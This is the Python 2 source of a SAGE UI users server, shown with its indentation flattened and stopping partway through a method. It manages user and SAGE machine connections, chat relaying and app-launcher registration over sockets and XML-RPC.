#!/usr/bin/env python
############################################################################
#
# SAGE UI Users Server - A server that handles users, fsManagers and chat for SAGE
#
# Copyright (C) 2005 Electronic Visualization Laboratory,
# University of Illinois at Chicago
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the distribution.
# * Neither the name of the University of Illinois at Chicago nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Direct questions, comments etc about SAGE UI to www.evl.uic.edu/cavern/forum
#
# Author: Ratko Jagodic
#
############################################################################
from threading import *
import string, socket, os, os.path, sys, time, SimpleXMLRPCServer, xmlrpclib
# some global constants
CHUNK_SIZE = 2048 # we use fixed size messages... in bytes
SOCKET_TIMEOUT = 1 # in seconds
MSGLEN = CHUNK_SIZE
SEPARATOR = '\0' # null character for separation
NEW_STYLE_VER = "2.82" # below this UIs don't support system IP/port for machines
USER_SERVER_PORT = 15558 # port for the server to listen for User connections
SAGE_SERVER_PORT = 15557 # port for the server to listen for SAGE connections
MAX_USER_CONNECTIONS = 100 # maximum number of simultaneous User connections
MAX_SAGE_CONNECTIONS = 50 # maximum number of simultaneous SAGE connections
PRINT_TO_SCREEN = False # for debugging
#(prints our messages onto the screen as well as the log file)
socket.setdefaulttimeout(SOCKET_TIMEOUT)
messageNames = {}
messageNames[ 2000 ] = "Register"
messageNames[ 2001 ] = "Incoming Chat Message"
messageNames[ 2002 ] = "Check Username"
messageNames[ 2003 ] = "Unregister from room"
messageNames[ 30000 ] = "Machine Status"
messageNames[ 30001 ] = "User Status"
messageNames[ 30002 ] = "Outgoing Chat Message"
messageNames[ 30003 ] = "Username OK"
messageNames[ 31000 ] = "Info Message"
# MESSAGES:
#
#
# Notes:
# --------------------
# All messages are sent in this format (as strings):
# code
# data
#
# For example:
# "2002"
# "Ratko"
#
#
# All machines are keyed by machineId, i.e. the address that the users should connect to in order to control SAGE
#
#
# <<< UI ---> SERVER >>>
# CODE FORMAT MESSAGE
# ----------------------------------------------------------------
# 2000 username register this user with the Users server
# info
# machine_id the machines the user is connected to
#
# 2001 from={username} send a chat message to one person or to all
#            to={"all" | id}       id = specific to users connected to a specific SAGE machine
# message
#
# 2002 username check username for duplicates
#
# 2003 username unregister this username from the machine specified
# machine_id
#
#
# <<< SERVER ---> UI >>>
# CODE FORMAT MESSAGE
# ----------------------------------------------------------------
#
# 30000 machine_name a status list of all the MACHINES registered with the server
# ip
# port
# machineId
# alive={"1" | "0"} if the machine is alive, send 1, otherwise send 0
# displayInfo in this format: "Xtiles Ytiles tileWidth tileHeight"
# systemIP systemPort older UIs don't support this so not sent to them
# "\x00" < --- a break between different blocks of data
# machine_name
# ip
# port
# machineId
# alive={"1" | "0"} if the machine is alive, send 1, otherwise send 0
# displayInfo in this format: "Xtiles Ytiles tileWidth tileHeight"
# systemIP systemPort older UIs don't support this so not sent to them
# "\x00"
# ....
#
#
# 30001 username receive a list of USERS that are connected and their info
# info
# machine_id the machines the user is connected to
# machine_id
# "\x00" < --- a break between different users' info
# username
# info
# machine_id
# "\x00"
# ....
#
# 30002 from={username} receive a chat message from one person,
# to={"all" | id} id = specific to users connected to a specific SAGE machine
# message
#
# 30003 "1" | "0" 1=username OK, 0=username already in use
#
# 31000 message an informative message... just any string
#
#
#
# <<< SAGE ---> SERVER >>>
# CODE FORMAT MESSAGE
# ----------------------------------------------------------------
#
# 100 machine_name version "i am alive" message from SAGE
# pubIP pubPort < --- machine ip and port that SAGE UIs should connect to
# sysIP sysPort < --- machine ip and port that the apps should use for streaming
# displayInfo
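# Illustrative sketch only -- not used by this server. A minimal example of how a UI
# client might compose the fixed-size "register" message (code 2000) described above:
# messages are CHUNK_SIZE bytes, "code\ndata", padded with spaces the same way
# MakeMsg() below pads outgoing messages. All argument values are hypothetical.
def _example_compose_register(username="Ratko", info="some info", machine_id="127.0.0.1:15557"):
    data = "\n".join([username, info, machine_id])
    msg = "2000\n" + data
    return msg + " " * (CHUNK_SIZE - len(msg))   # pad to the fixed message size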
# log the actions in a file
os.chdir(sys.path[0]) #change to the folder where the script is running
logFile = open("log.txt", "a")
logFileLock = RLock() #since multiple threads are writing to the same file
def WriteToFile(text):
logFileLock.acquire()
logFile.write( text )
if PRINT_TO_SCREEN:
print text
logFile.flush() #flush the buffer to a file (especially needed if running as a daemon)
logFileLock.release()
# record some stats to a file
statsFile = open("stats.txt", "a")
statsFileLock = RLock()
def WriteStats(text):
statsFileLock.acquire()
statsFile.write( text )
if PRINT_TO_SCREEN:
print text
statsFile.flush() #flush the buffer to a file (especially needed if running as a daemon)
statsFileLock.release()
############################################################################
#
# CLASS: SingleMachine
#
# DESCRIPTION: This is basically a thread that deals with the connection
# to ONLY ONE SAGE. It's created by the Server class upon
# connection from sage and it receives a clientsocket that
# was internally created by the Server. It then uses this
# socket for all the communication. One of these exists for
# every sage that is connected to this Server and the Server class
# keeps these SingleMachine objects in a list.
#
# DATE: May, 2005
#
############################################################################
class SingleMachine(Thread):
def __init__(self, socket, address, server):
Thread.__init__(self)
self.socket = socket
self.socket.settimeout(SOCKET_TIMEOUT)
self.server = server
self.threadKilled = False
self.name = ""
        self.ip = address[0] # these 2 are used for control communication
self.port = ""
self.systemIP = "" # these 2 are used for streaming the data
self.systemPort = ""
self.sageVersion = None #version of SAGE
self.oldStyleSAGE = False
self.machineId = self.ip+":"+str(self.port)
self.displayInfo = ""
        self.receivedRegisterMessage = False # in case SAGE connects but never registers, the thread would otherwise run forever
self.lastReportTime = None #this will be the time of the last report from fsManager
self.maxReportInterval = 6.0 #allow up to 6 seconds between the sage reports and then consider the fsManager disconnected
t = Timer(10, self.WaitForRegisterMessage)
t.start()
def WaitForRegisterMessage(self):
if not self.receivedRegisterMessage:
self.Stop(False)
# stops the thread, breaks the connection and unregisters the machine from this server
def Stop(self, unregister=True):
# record the stats
stats = "\nSAGE disconnected: "+self.name+" "+str(self.machineId)+" "+str(self.displayInfo)+" "+str(time.asctime())
WriteStats(stats)
WriteToFile( "\n*** Connection closed with SAGE: \"" + self.name + "\" <" + time.asctime() + ">")
self.threadKilled = True
if unregister:
self.server.UnregisterMachine(self.GetId())
self.socket.close()
#-----------------------------------------------
# data access methods
#-----------------------------------------------
def GetIP(self):
return self.ip
def GetName(self):
return self.name
def GetSystemIP(self):
return self.systemIP
def GetSystemPort(self):
return self.systemPort
def GetPort(self):
return self.port
def IsAlive(self):
return not self.threadKilled
def GetDisplayInfo(self):
return self.displayInfo
def GetId(self):
return self.machineId
#-------------------------------------------------------
# RECEIVING
#-------------------------------------------------------
# runs in a thread... started in the Server class
def run(self):
while not self.threadKilled:
try:
# this first receive will receive the length of the data
cleanMsg = self.GetMessage()
if not cleanMsg:
break #connection was closed
msgHeader = string.split( cleanMsg, "\n", 1 )
if len( msgHeader ) > 0:
code = int(msgHeader[0])
data = msgHeader[1]
else:
WriteToFile( "\n ERROR: message could not be split correctly into (code, data)")
break
# call the appropriate function to handle the incoming data
if code == 100:
self.OnRegisterMachineMessage(data)
except socket.timeout:
# if the fsManager hasn't reported in a while, assume it's dead and quit
if self.lastReportTime:
if time.time() - self.lastReportTime > self.maxReportInterval:
WriteToFile( "\nERROR: Time expired with SAGE connection " + self.name)
self.Stop()
continue
except socket.error:
WriteToFile( "\nERROR: UsersServer: socket error in connection with SAGE: " + self.name)
self.Stop()
break
# outside of while loop
self.threadKilled = True
WriteToFile("\nThread from "+self.name +" died")
def GetMessage(self, MSG_SIZE=CHUNK_SIZE):
# this first receive will receive the length of the data
msg = self.socket.recv(MSG_SIZE)
if len( msg ) < 2:
WriteToFile("\nERROR: message length < 2. Closing the connection with SAGE "+self.name)
self.Stop() #connection was closed
return False
        # recv is not guaranteed to return exactly CHUNK_SIZE bytes,
        # so keep receiving until the whole chunk has been read
while len( msg ) < MSG_SIZE:
msg = msg + self.socket.recv(MSG_SIZE - len( msg))
# strip all the empty spaces from the message
cleanMsg = self.CleanBuffer( msg )
cleanMsg = string.strip( cleanMsg )
return cleanMsg
# converts all non-printable characters from the buffer to white spaces
# (so that they can be removed using string.strip() function)
def CleanBuffer( self, stBuffer ):
stNewBuffer = ""
for ch in stBuffer:
if ( ch in string.printable ):
stNewBuffer = stNewBuffer + ch
else:
stNewBuffer = stNewBuffer + " "
return stNewBuffer
#-------------------------------------------------------
# MESSAGE CALLBACKS
#-------------------------------------------------------
def OnRegisterMachineMessage(self, data):
""" there are two different fsManagers so handle them differently """
if self.receivedRegisterMessage:
# record the time when it was reported
self.lastReportTime = time.time()
return
self.receivedRegisterMessage = True
tokens = string.split(data, "\n", 3)
        if len(tokens[0].split()) == 1: # based on this we know which fsManager this is
self.name = tokens[0]
self.ip = tokens[1]
self.port = int(tokens[2])
self.systemIP = self.ip #make them the same as public if not given
self.systemPort = self.port
self.oldStyleSAGE = True
else: # new style SAGE includes the system port/ip as well as the sage version
(self.name, self.sageVersion) = tokens[0].split()
sys = tokens[1].split()
self.systemIP = sys[0].strip()
self.systemPort = int(sys[1].strip())
pub = tokens[2].split()
self.ip = pub[0].strip()
self.port = int(pub[1].strip())
self.machineId = self.ip+":"+str(self.port)
self.displayInfo = tokens[3]
self.server.RegisterMachine(self)
# record the stats
stats = "\nSAGE connected: "+self.name+" "+str(self.machineId)+" "+str(self.displayInfo)+" "+str(time.asctime())
WriteStats(stats)
############################################################################
#
# CLASS: SingleUser
#
# DESCRIPTION: This is basically a thread that deals with the connection
# to ONLY ONE SAGE UI. It's created by the Server class upon
# connection from a user and it receives a clientsocket that
# was internally created by the Server. It then uses this
# socket for all the communication. One of these exists for
# every user that is connected to this Server and the Server class
# keeps these SingleUser objects in a list.
#
# DATE: May, 2005
#
############################################################################
class SingleUser(Thread):
def __init__(self, socket, address, server):
Thread.__init__(self)
self.socket = socket
self.socket.settimeout(SOCKET_TIMEOUT)
self.server = server
self.threadKilled = False
self.username = ""
self.info = ""
self.machineList = [] # the SAGE machines that this user is connected to ( a list of machineIds )
self.ip = address[0]
self.registered = False
self.ui_version = "2.0" # default
self.newStyle = False
self.messageCallback = {}
self.messageCallback[ 2000 ] = self.OnRegister
self.messageCallback[ 2001 ] = self.OnChatMessage
self.messageCallback[ 2002 ] = self.OnCheckUsername
self.messageCallback[ 2003 ] = self.OnUnregisterUser
# send the first reply message with machine status
self.server.OnConnectUser(self)
self.stopped = False
def Stop(self, unregister=True):
self.stopped = True
# record the stats
stats = "\nUser disconnected: "+self.GetName()+" "+str(self.ip)+" "+str(time.asctime())
WriteStats(stats)
self.threadKilled = True
WriteToFile( "\n*** Connection closed with user: \"" + self.username + "\" <" + time.asctime() + ">")
if unregister and self.registered:
self.server.UnregisterUser(self, self.username)
self.server.OnDisconnectUser(self)
#self.threadKilled = True
self.socket.close()
def GetInfo(self):
return self.info
def GetName(self):
return self.username
def GetMachines(self):
return self.machineList
def IsNewStyle(self):
return self.newStyle
#-------------------------------------------------------
# RECEIVING
#-------------------------------------------------------
# runs in a thread... started in the Server class
def run(self):
while not self.threadKilled:
try:
# this first receive will receive the length of the data
cleanMsg = self.GetMessage()
if not cleanMsg:
break #connection was closed
msgHeader = string.split( cleanMsg, "\n", 1 )
if len( msgHeader ) > 0:
code = int(msgHeader[0])
data = msgHeader[1]
else:
WriteToFile( "\n ERROR: message could not be split correctly into (code, data)")
break
# print what we received
if messageNames.has_key(code):
WriteToFile( "RECEIVED: \"" + messageNames[code] + "\" from " + self.username + " (" + str(self.ip) + ")")
# call the appropriate function to handle the incoming data
if self.messageCallback.has_key( code ):
self.messageCallback[ code ](data)
else:
WriteToFile("\nERROR: Message code " + str(code) + " unrecognized")
except socket.timeout:
continue
except socket.error:
WriteToFile( "\nERROR: UsersServer: socket error in connection with: " + self.username)
self.Stop()
break
if self.stopped == False:
WriteToFile("Stopping the thread")
self.Stop()
WriteToFile("Thread from " + self.username + " has died")
def GetMessage(self, clean=True, MSG_SIZE=CHUNK_SIZE):
# this first receive will receive the length of the data
msg = self.socket.recv(MSG_SIZE)
if len( msg ) < 2:
self.Stop() #connection was closed
return False
        # recv is not guaranteed to return exactly CHUNK_SIZE bytes,
        # so keep receiving until the whole chunk has been read
while len( msg ) < MSG_SIZE:
msg = msg + self.socket.recv(MSG_SIZE - len( msg))
if clean:
# strip all the empty spaces from the message
cleanMsg = self.CleanBuffer( msg )
cleanMsg = string.strip( cleanMsg )
return cleanMsg
else:
return msg
# converts all non-printable characters from the buffer to white spaces
# (so that they can be removed using string.strip() function)
def CleanBuffer( self, stBuffer ):
stNewBuffer = ""
for ch in stBuffer:
if ch == '\0': #this is our message separator so handle it separately
stNewBuffer += ch
elif ch in string.printable:
stNewBuffer += ch
else:
stNewBuffer += " "
return stNewBuffer
#-------------------------------------------------------
# SENDING
#-------------------------------------------------------
# make the message with the right code and send it
def MakeMsg(self, code, data):
msg = '%8s\n%s' %(code,data)
WriteToFile( "SEND: \"" + messageNames[code] + "\" to " + self.username)
msg = msg + ' ' * (MSGLEN-len(msg))
self.Send(msg)
# just performs the send operation
def Send(self, msg):
try:
self.socket.send(msg)
except socket.error:
WriteToFile( "\nERROR: UsersServer: Could not send message: socket error with: "+self.username )
self.socket.close()
#self.Stop()
# record the stats
stats = "\nUser disconnected: "+self.GetName()+" "+str(self.ip)+" "+str(time.asctime())
WriteStats(stats)
#self.Stop()
# the run() method will catch this as well and it will handle the cleanup
# these functions are called by the main Server class in order to send
# messages to all the users via their own sockets used in this SingleUser class
def SendChatMessage(self, message):
self.MakeMsg(30002, message)
# form a message and send the users status
def SendUsersStatusMessage(self, statusList):
message = ""
# make the message out of the machine status list
for userInfo in statusList:
            if message != "": message += SEPARATOR #add the separator before adding each new user info
for infoItem in userInfo:
message += str(infoItem) + "\n"
self.MakeMsg(30001, message)
# form a message and send the machine status
def SendMachinesStatusMessage(self, statusList):
message = ""
# make the message out of the machine status list
for machineInfo in statusList:
if message != "": message += SEPARATOR #add the separator before adding each new machine info
for infoItem in machineInfo:
message += str(infoItem) + "\n"
self.MakeMsg(30000, message)
def SendUsernameOKMessage(self, usernameOK):
self.MakeMsg( 30003, str(int(usernameOK)) )
#-------------------------------------------------------
# MESSAGE CALLBACKS
#-------------------------------------------------------
def OnRegister(self, data):
tokens = string.split(data, "\n")
self.username = tokens[0]
self.info = tokens[1]
machineId = tokens[2]
if not machineId in self.machineList:
self.machineList.append(machineId)
# record the stats
stats = "\nUser registered: "+self.GetName()+" "+str(self.ip)+" "+str(machineId)+" "+str(time.asctime())
WriteStats(stats)
self.server.RegisterUser(self, self.username)
# if the version of the connected UI handles system ip/port
# for each machine, send it after the registration message
if self.IsNewStyle():
status = self.server.MakeNewMachinesStatusList()
self.SendMachinesStatusMessage(status)
def OnChatMessage(self, data):
tokens = string.split(data, "\n", 2)
if tokens[1] == "all":
toRoom = "all"
else:
toRoom = tokens[1]
self.server.ForwardChatMessage(self, toRoom, data)
def OnCheckUsername(self, data):
tokens = string.split(data, "\n")
if len(tokens) > 1: # sageui v2.82+ sends a version number
            self.ui_version = tokens[1].strip()
self.newStyle = True
self.SendUsernameOKMessage(self.server.IsUsernameOK(self, tokens[0]) )
def OnUnregisterUser(self, data):
tokens = string.split(data, "\n")
username = tokens[0]
machineId = tokens[1]
if machineId in self.GetMachines():
self.machineList.remove(machineId)
# record the stats
stats = "User unregistered: "+self.GetName()+" "+str(self.ip)+" "+str(machineId)+" "+str(time.asctime())
WriteStats(stats)
self.server.UpdateUsers()
############################################################################
#
# CLASS: SingleLauncher
#
# DESCRIPTION: This class describes one appLauncher connection for use by
# SAGE UIs. It mainly contains a list of applications and their configs
#
#
############################################################################
class SingleLauncher:
def __init__(self, launcherId, name, ip, port, appList):
self.port = port
self.appList = appList
self.ip = ip
self.launcherId = launcherId
self.name = name
self.oldT = time.time()
        self.maxReportTime = 10 #allow maximum 10 seconds between reports
def getId(self):
return self.launcherId
def getIP(self):
return self.ip
def getAppList(self):
return self.appList
def setAppList(self, appList):
self.appList = appList
def getPort(self):
return self.port
def getName(self):
return self.name
def isAlive(self):
if (time.time() - self.oldT) < self.maxReportTime:
return True
else:
return False
def report(self):
self.oldT = time.time()
############################################################################
#
# CLASS: Server
#
# DESCRIPTION: This server should run as a daemon and constantly listen for
# connections on a certain port. Once it accepts a connection
# it spawns a thread (SingleUser) that takes care of listening for the
# incoming messages and sending messages on that socket.
# It also relays all the incoming messages to their corresponding
#              recipients. To do that it keeps track of all the users connected
# in a list registeredUsers[]. It also listens for connections
# from fsManagers and keeps track of them in connectedMachines[] (
# a hash of singleMachines).
#
# DATE: May, 2005
#
############################################################################
class Server:
def __init__(self):
self.serverRunning = True
# start the XMLRPC server in a thread
xmlrpcServer = Thread(target=self.StartXMLRPCServer)
xmlrpcServer.start()
# start the two servers listening on separate ports
machinesServer = Thread(target=self.StartMachinesServer)
machinesServer.start()
try:
self.StartUsersServer() #start this one in the main thread so that we can capture
#keystrokes such as Ctrl-C
except KeyboardInterrupt:
WriteToFile ("\n****** Shutting down the server *******")
self.serverRunning = False
self.CloseAllUserConnections()
self.CloseAllSAGEConnections()
self.xmlrpc.server_close()
#logFile.close()
#------------------------------------------------------------------------------
# XML-RPC STUFF - FOR REMOTE ADMINISTRATION, APPLAUNCHER AND SAGE UI PROXY
#------------------------------------------------------------------------------
def StartXMLRPCServer(self):
self.registeredLaunchers = {} #key=launcherID, value=SingleLauncher object
# start the XML-RPC server
self.xmlrpc = XMLRPCServer(("", 8009))
# users
self.xmlrpc.register_function(self.GetRegisteredUsers)
self.xmlrpc.register_function(self.GetUserInfo)
self.xmlrpc.register_function(self.DisconnectUser)
# machines
self.xmlrpc.register_function(self.GetMachineInfo)
self.xmlrpc.register_function(self.GetRegisteredMachines)
self.xmlrpc.register_function(self.DisconnectMachine)
# appLauncher
self.xmlrpc.register_function(self.ReportLauncher)
self.xmlrpc.register_function(self.GetRegisteredLaunchers)
self.xmlrpc.register_function(self.UnregisterLauncher)
WriteToFile ("Starting the XML-RPC Server...\n")
while self.serverRunning:
try:
self.xmlrpc.handle_request() #accept and process xmlrpc requests
self.__checkLaunchers() #check to see whether every launcher is still alive
except socket.timeout:
continue
except:
WriteToFile( "\n=====> XMLRPC Server ERROR:" )
WriteToFile( "".join(tb.format_exception(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])) )
continue
### loops through all the app launchers and checks whether they are still alive
    ### the minimum frequency of checks is defined by the timeout set in the XMLRPCServer constructor
def __checkLaunchers(self):
for l in self.registeredLaunchers.values():
if not l.isAlive():
WriteToFile("Launcher "+l.getName()+"("+l.getId()+") unregistered")
self.UnregisterLauncher(l.getId())
### called by each appLauncher in order to register with the server
def ReportLauncher(self, launcherName, launcherIP, launcherPort, appList):
launcherId = launcherIP+":"+str(launcherPort)
if launcherId in self.registeredLaunchers:
self.registeredLaunchers[launcherId].report() # launcher already exists so just update its last report time
self.registeredLaunchers[launcherId].setAppList(appList)
else:
l = SingleLauncher(launcherId, launcherName, launcherIP, launcherPort, appList)
WriteToFile("Launcher "+l.getName()+"("+l.getId()+") registered")
self.registeredLaunchers[launcherId] = l
return launcherId
### removes the appLauncher from a list of registered ones
def UnregisterLauncher(self, launcherId):
if launcherId in self.registeredLaunchers:
del self.registeredLaunchers[ launcherId ]
return 1
### return a hash of all the app launchers running
### key= "name:launcherId" , value=appList (that's another hash of appNames and their configs)
def GetRegisteredLaunchers(self):
tempHash = {}
for l in self.registeredLaunchers.itervalues():
tempHash[ l.getName()+":"+l.getId() ] = l.getAppList()
return tempHash
### return a list of currently registered users and machines
def GetRegisteredUsers(self):
self.registeredUsersLock.acquire()
users = self.registeredUsers.keys()
self.registeredUsersLock.release()
return users
def GetRegisteredMachines(self):
self.connectedMachinesLock.acquire()
machineList = []
for machineId, singleMachine in self.connectedMachines.iteritems():
machineList.append(singleMachine.GetName() + " - " + str(machineId))
self.connectedMachinesLock.release()
return machineList
## def GetConnectedUsers(self):
## self.connectedUsersLock.acquire()
## users = []
## for user in self.connectedUsers:
## users.append(user.GetName())
## self.connectedUsersLock.release()
## return users
### return user and machine info
def GetUserInfo(self, username):
self.registeredUsersLock.acquire()
if self.registeredUsers.has_key(username):
singleUser = self.registeredUsers[username]
machineList = []
self.connectedMachinesLock.acquire()
for machineId in singleUser.GetMachines():
if self.connectedMachines.has_key(machineId):
machineList.append(self.connectedMachines[machineId].GetName())
self.connectedMachinesLock.release()
self.registeredUsersLock.release()
return machineList #singleUser.GetMachines()
else:
self.registeredUsersLock.release()
return -1
def GetMachineInfo(self, machineId):
self.connectedMachinesLock.acquire()
if self.connectedMachines.has_key(machineId):
m = self.connectedMachines[machineId]
self.connectedMachinesLock.release()
#now make a list of all the users that are connected to this machine
self.registeredUsersLock.acquire()
userList = []
for name, singleUser in self.registeredUsers.iteritems():
if machineId in singleUser.GetMachines():
userList.append(name)
self.registeredUsersLock.release()
return (m.GetName(), m.GetIP(), m.GetPort(), m.GetId(), m.IsAlive(), m.GetDisplayInfo(), userList)
else:
self.connectedMachinesLock.release()
return (-1,-1,-1,-1,-1,-1,-1)
### allow the user to close individual connections with SAGE and users
def DisconnectUser(self, username):
self.registeredUsersLock.acquire()
if self.registeredUsers.has_key(username):
singleUser = self.registeredUsers[username]
singleUser.Stop()
self.registeredUsersLock.release()
return True
def DisconnectMachine(self, machineId):
self.connectedMachinesLock.acquire()
if self.connectedMachines.has_key(machineId):
singleMachine = self.connectedMachines[machineId]
singleMachine.Stop()
self.connectedMachinesLock.release()
return True
#----------------------------------------------------------------------------------------
# THE SERVERS RUNNING IN THREADS RECEIVING CONNECTIONS FROM USERS AND SAGES
#----------------------------------------------------------------------------------------
# runs in the main thread
def StartUsersServer(self):
self.registeredUsers = {} # a hash of SingleUsers for every registered user (keyed by username)
self.registeredUsersLock = RLock() #used to lock the access to self.registeredUsers hash
self.connectedUsers = [] # this includes all the users that are connected to the server
self.connectedUsersLock = RLock() # but not necessarily registered with it. (so registeredUsers is a subset of this)
self.pendingUsernames = [] # usernames that have been checked with the server but not yet registered
self.pendingUsernamesLock = RLock()
# create the server socket and accept a connection
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if serversocket is None:
WriteToFile( "\n\nERROR: Server socket could not be created... exiting" )
return False
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", USER_SERVER_PORT))
serversocket.listen(MAX_USER_CONNECTIONS)
serversocket.settimeout(SOCKET_TIMEOUT)
WriteToFile( "Users Server waiting for connections on port " + str(USER_SERVER_PORT) + "...\n" )
while self.serverRunning:
try:
(clientsocket, address) = serversocket.accept()
except socket.timeout:
continue
except:
WriteToFile( "\n\nUsers Server Not accepting any more connections... exiting <" + time.asctime() + ">\n" )
self.CloseAllUserConnections()
self.serverRunning = False
break
WriteToFile( "\n*** Connection accepted from " + str(address[0]) + " <" + time.asctime() + ">" )
# create a SingleUser instance and start the receiver in a thread
t = SingleUser(clientsocket, address, self)
self.connectedUsersLock.acquire()
self.connectedUsers.append(t) #add the user to the list of all connected users
self.connectedUsersLock.release()
t.start()
WriteToFile("\nUsers Server exited")
# runs in a thread
def StartMachinesServer(self):
self.connectedMachines = {} # a hash of SingleMachines for every connected SAGE (keyed by id)
self.connectedMachinesLock = RLock()
# create the server socket and accept a connection
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if serversocket is None:
WriteToFile( "\n\nERROR: SAGE Server socket could not be created... exiting" )
return False
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", SAGE_SERVER_PORT))
serversocket.listen(MAX_SAGE_CONNECTIONS)
serversocket.settimeout(SOCKET_TIMEOUT)
WriteToFile( "SAGE Server waiting for connections on port " + str(SAGE_SERVER_PORT) + "...\n" )
while self.serverRunning:
try:
(clientsocket, address) = serversocket.accept()
except socket.timeout:
continue
except:
WriteToFile( "\n\nSAGE Server Not accepting any more connections... exiting <" + time.asctime() + ">\n" )
self.CloseAllSAGEConnections()
self.serverRunning = False
break
WriteToFile( "\n*** SAGE Connection accepted from " + str(address[0]) + " <" + time.asctime() + ">" )
# create a SingleMachine instance and start the receiver in a thread
t = SingleMachine(clientsocket, address, self)
t.start()
WriteToFile("\nSAGE Server exited")
self.xmlrpc.server_close()
def CloseAllUserConnections(self):
for singleUser in self.registeredUsers.itervalues():
singleUser.Stop(unregister=False) #we dont want to unregister because the server is closing anyway
def CloseAllSAGEConnections(self):
for singleMachine in self.connectedMachines.itervalues():
singleMachine.Stop(unregister=False) #we dont want to unregister because the server is closing anyway
#-------------------------------------------------------
# MESSAGE CALLBACKS - USERS
#-------------------------------------------------------
# when the user connects, we need to send him the list of all the SAGE
# machines registered with this server
def OnConnectUser(self, singleUser):
self.connectedMachinesLock.acquire()
singleUser.SendMachinesStatusMessage(self.MakeMachinesStatusList())
self.connectedMachinesLock.release()
# if the user connected but never registered, we still have to remove him from this list
def OnDisconnectUser(self, singleUser):
# remove from the pending usernames if connected
self.pendingUsernamesLock.acquire()
if singleUser.GetName() in self.pendingUsernames:
self.pendingUsernames.remove(singleUser.GetName())
self.pendingUsernamesLock.release()
# remove from connected users list
self.connectedUsersLock.acquire()
if singleUser in self.connectedUsers:
self.connectedUsers.remove(singleUser)
self.connectedUsersLock.release()
# adds the new user keyed by its name and makes the new status list
# returns: true if successful, false otherwise (if username already exists)
def RegisterUser(self, singleUser, username):
self.registeredUsersLock.acquire()
if not self.registeredUsers.has_key(username) or self.registeredUsers[username].ip == singleUser.ip:
self.registeredUsers[ username ] = singleUser # add the user to the list
singleUser.registered = True
# remove from the list of pending usernames
self.pendingUsernamesLock.acquire()
if username in self.pendingUsernames:
self.pendingUsernames.remove(username)
self.pendingUsernamesLock.release()
# update the status of other users
self.UpdateUsers()
self.registeredUsersLock.release()
def UnregisterUser(self, singleUser, username):
# remove the user from the list of all the connected users
self.connectedUsersLock.acquire()
if singleUser in self.connectedUsers:
self.connectedUsers.remove(singleUser)
WriteToFile("removed "+username+" from connectedUsers")
self.connectedUsersLock.release()
# now remove him from the list of registered users
self.registeredUsersLock.acquire()
if self.registeredUsers.has_key( username ):
del self.registeredUsers[ username ]
self.UpdateUsers()
WriteToFile("removed "+username+" from registeredUsers")
self.registeredUsersLock.release()
# now, check all the rooms that the user was connected to and see if any
# of them are empty now that the user has left... if there are empty rooms,
# close them
emptyRooms = False
self.connectedMachinesLock.acquire()
for room in self.connectedMachines.keys()[:]: #loop through all the machines just in case there are some daemons
if self.connectedMachines.has_key(room) and (not self.connectedMachines[room].IsAlive()) and self.IsRoomEmpty(room):
emptyRooms = True
del self.connectedMachines[room]
WriteToFile("closed the room "+room)
if emptyRooms:
self.UpdateMachines()
self.connectedMachinesLock.release()
# updates all the users with the new status (based on self.registeredUsers)
def UpdateUsers(self):
self.registeredUsersLock.acquire()
statusList = self.MakeUsersStatusList()
for username, singleUser in self.registeredUsers.iteritems():
if len(singleUser.GetMachines()) > 0:
singleUser.SendUsersStatusMessage(statusList)
self.registeredUsersLock.release()
    # forwards the chat message either to all the chat rooms or a specific one
def ForwardChatMessage(self, sender, toRoom, message):
self.registeredUsersLock.acquire()
for name, singleUser in self.registeredUsers.iteritems():
singleUser.SendChatMessage(message)
self.registeredUsersLock.release()
# checks for duplicates in usernames
def IsUsernameOK(self, singleUser, username):
self.registeredUsersLock.acquire()
self.pendingUsernamesLock.acquire()
if username in self.registeredUsers: # username already exists
if self.registeredUsers[username].ip == singleUser.ip: # its the same user reconnecting so it's OK
usernameTaken = False
else:
usernameTaken = True
elif username in self.pendingUsernames:
usernameTaken = True
else:
usernameTaken = False
if not usernameTaken:
self.pendingUsernames.append(username)
t = Timer(2, self.ExpireUsername, [username])
t.start()
self.pendingUsernamesLock.release()
self.registeredUsersLock.release()
return not usernameTaken
def ExpireUsername(self, username):
# remove from the list of pending usernames
self.pendingUsernamesLock.acquire()
if username in self.pendingUsernames:
self.pendingUsernames.remove(username)
self.pendingUsernamesLock.release()
#make the status list consisting of name,info,machine,name,info,machine...
def MakeUsersStatusList(self):
statusList = []
keys = self.registeredUsers.keys()
keys.sort()
for username in keys:
user = self.registeredUsers[username]
tempList = []
tempList.append(username)
tempList.append(user.GetInfo())
for machine in user.GetMachines():
tempList.append(machine)
statusList.append(tempList)
return statusList
#-------------------------------------------------------
# MESSAGE CALLBACKS - MACHINES
#-------------------------------------------------------
#registers SAGE with the server so that it's visible to the users
def RegisterMachine(self, singleMachine):
machineId = singleMachine.GetId()
self.connectedMachinesLock.acquire()
